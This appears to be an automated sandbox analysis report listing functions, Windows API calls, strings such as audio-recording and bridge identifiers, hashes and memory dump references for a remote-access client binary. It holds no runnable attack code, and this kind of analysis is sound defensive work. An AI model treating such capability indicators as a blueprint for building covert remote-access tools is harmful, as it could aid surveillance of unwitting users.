                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDeleteEnumMessageSendTextTimeoutWindowWindows_memmove
                                                                                                                                                                                • String ID: DISPLAY
                                                                                                                                                                                • API String ID: 2477959660-865373369
                                                                                                                                                                                • Opcode ID: 259d4e0676ffa43da281c36c5dfab761b9218b03ec44c0f8054c2a89f075a64a
                                                                                                                                                                                • Instruction ID: 1cae3fa44a4c898473a5315a21a633ff98b49f2e5ae7be52a981a09433012228
                                                                                                                                                                                • Opcode Fuzzy Hash: 259d4e0676ffa43da281c36c5dfab761b9218b03ec44c0f8054c2a89f075a64a
                                                                                                                                                                                • Instruction Fuzzy Hash: C7812CB5A001299FDB24CF65DD85BEAF7B8FB48304F144199E90DA7240EB70AE80CF94
                                                                                                                                                                                Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                                                                                                                • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                                                                                                                • GetTextColor.GDI32(?), ref: 1101F645
                                                                                                                                                                                  • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                                                                                                                  • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                                                                                                                  • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                                                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                                                                                                                  • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                                                                                                                  • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                                                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                                                                                                                • String ID: VUUU$VUUU
                                                                                                                                                                                • API String ID: 179481525-3149182767
                                                                                                                                                                                • Opcode ID: b36bf97023f72aed67f23153da1d5ee1a7ce674b8c32f7e66137e1d7c2203900
                                                                                                                                                                                • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                                                                                                                • Opcode Fuzzy Hash: b36bf97023f72aed67f23153da1d5ee1a7ce674b8c32f7e66137e1d7c2203900
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                                                                                                                Function 111192A0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 189COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • _free.LIBCMT ref: 11119469
                                                                                                                                                                                  • Part of subcall function 11118EA0: EnterCriticalSection.KERNEL32(11001824,2520CF5D,?,?,00000000), ref: 11118EF6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterSection__wcstoi64_free
                                                                                                                                                                                • String ID: Audio$DisableAudio$Error$Listen$Record$RecordAudio
                                                                                                                                                                                • API String ID: 3293337554-3719283765
                                                                                                                                                                                • Opcode ID: 7563bf03e93ce48be8ec8a88db3a1ef48edcda3a9f3e21659a90d8de8a8ef8a7
                                                                                                                                                                                • Instruction ID: 9007e7f4ccb9856765611831f357c61b2977cef6a76590855f2730585900f2b1
                                                                                                                                                                                • Opcode Fuzzy Hash: 7563bf03e93ce48be8ec8a88db3a1ef48edcda3a9f3e21659a90d8de8a8ef8a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51EF74B0060AABEB10CE79CA81BAEF7A6BF44714F108138EA159F6C5E770E941C790
                                                                                                                                                                                Function 110E13B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                • API String ID: 2168136238-4289949731
                                                                                                                                                                                • Opcode ID: 83e4826dcbbf1471a518f1f566a8088656470ee0a75d70ca788ba76f2f8780e9
                                                                                                                                                                                • Instruction ID: 18e91b11eabefdaa2a38ccec96168d260a1d237358dab459284690cf681537c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 83e4826dcbbf1471a518f1f566a8088656470ee0a75d70ca788ba76f2f8780e9
                                                                                                                                                                                • Instruction Fuzzy Hash: A141A3B2B012458FD724CE5ED8849DEF7EAEBC5764B20492EE552C7780DB70AC418791
                                                                                                                                                                                Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110276E1
                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110276EB
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$DispatchSleepTranslate
                                                                                                                                                                                • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                                                                                                • API String ID: 3237117195-3850961587
                                                                                                                                                                                • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                                                                                                                • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                                                                                                                • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                                                                                                                                Function 11113660 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memmove.LIBCMT ref: 111136C0
                                                                                                                                                                                • _memmove.LIBCMT ref: 11113773
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$ch <= width_bytes$idata->dcaf_repeat$row == buf
                                                                                                                                                                                • API String ID: 6605023-3537624830
                                                                                                                                                                                • Opcode ID: e2df8456e609886ddb8d5e0db59bc3c60a83a0f9a050762c7f1653997d81fb7c
                                                                                                                                                                                • Instruction ID: 6628ac56ff7c7928fdb6f71a1e648aa22a7a56641a9c87266c801660568c6a2e
                                                                                                                                                                                • Opcode Fuzzy Hash: e2df8456e609886ddb8d5e0db59bc3c60a83a0f9a050762c7f1653997d81fb7c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2441D775D14256ABCB16CF69D881AEAF7A8EF40224F08417AFC0C5E38DE6319650CBE1
                                                                                                                                                                                Function 11005210 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                                                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                                                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountEnable
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 4290561058-4108050209
                                                                                                                                                                                • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                                                                • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                                                                                                                • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                                                                • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                                                                                                                Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                                                                                • Opcode ID: f38c0d12b5bd38422dfbdaa09e2acce621d70411477d012f3efa09ae68e300b4
                                                                                                                                                                                • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                                                                                                                • Opcode Fuzzy Hash: f38c0d12b5bd38422dfbdaa09e2acce621d70411477d012f3efa09ae68e300b4
                                                                                                                                                                                • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                                                                                                                Function 11121410 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 1112144F
                                                                                                                                                                                • _memmove.LIBCMT ref: 11121515
                                                                                                                                                                                • _free.LIBCMT ref: 11121544
                                                                                                                                                                                  • Part of subcall function 11120080: DeleteObject.GDI32(?), ref: 111200AE
                                                                                                                                                                                  • Part of subcall function 11120080: SelectObject.GDI32(?,?), ref: 111200C2
                                                                                                                                                                                  • Part of subcall function 11120080: DeleteObject.GDI32(00000000), ref: 111200C9
                                                                                                                                                                                  • Part of subcall function 11120080: SelectPalette.GDI32 ref: 111200EF
                                                                                                                                                                                  • Part of subcall function 11120080: SetStretchBltMode.GDI32(?,00000001), ref: 1112011B
                                                                                                                                                                                  • Part of subcall function 11119650: GetParent.USER32(?), ref: 111196B4
                                                                                                                                                                                  • Part of subcall function 11119650: IsZoomed.USER32(?), ref: 11119752
                                                                                                                                                                                  • Part of subcall function 11119650: GetWindowRect.USER32(?,?), ref: 111197A8
                                                                                                                                                                                  • Part of subcall function 11119650: GetSystemMetrics.USER32(00000050), ref: 11119829
                                                                                                                                                                                  • Part of subcall function 1111F530: GdiFlush.GDI32 ref: 1111F54C
                                                                                                                                                                                  • Part of subcall function 1111F530: SelectObject.GDI32(?,?), ref: 1111F560
                                                                                                                                                                                  • Part of subcall function 1111F530: DeleteObject.GDI32(00000000), ref: 1111F56D
                                                                                                                                                                                  • Part of subcall function 1111F530: GetLastError.KERNEL32 ref: 1111F577
                                                                                                                                                                                  • Part of subcall function 1111F530: _free.LIBCMT ref: 1111F5B8
                                                                                                                                                                                  • Part of subcall function 1111F530: CreateDIBSection.GDI32(?,00000000,00000000,?,00000000,00000000), ref: 1111F624
                                                                                                                                                                                  • Part of subcall function 1111F530: SelectObject.GDI32(?,00000000), ref: 1111F654
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
